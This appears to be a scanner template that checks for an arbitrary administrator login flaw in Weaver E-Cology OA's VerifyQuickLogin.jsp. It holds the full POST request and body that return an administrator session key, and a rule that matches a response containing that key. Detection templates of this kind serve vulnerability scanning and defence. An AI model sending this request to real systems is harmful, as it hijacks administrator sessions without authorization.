id: e-cology-verify-quick-login-user-login

info:
  name: 泛微OA E-Cology VerifyQuickLogin.jsp 任意管理员登录漏洞
  author: zan8in
  severity: critical
  description: |
    泛微OA E-Cology VerifyQuickLogin.jsp文件中存在任意管理员登录漏洞，攻击着通过发送特殊的请求包可以获取管理员Session
    app="泛微-协同办公OA"
  reference:
    - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20VerifyQuickLogin.jsp%20%E4%BB%BB%E6%84%8F%E7%AE%A1%E7%90%86%E5%91%98%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E.html

rules:
  r0:
    request:
      method: POST
      path: /mobile/plugin/VerifyQuickLogin.jsp
      body: identifier=1&language=1&ipaddress=x.x.x.x
    expression: response.status == 200 && response.body.bcontains(b'"sessionkey":') && response.body.bcontains(b'"message":')
expression: r0()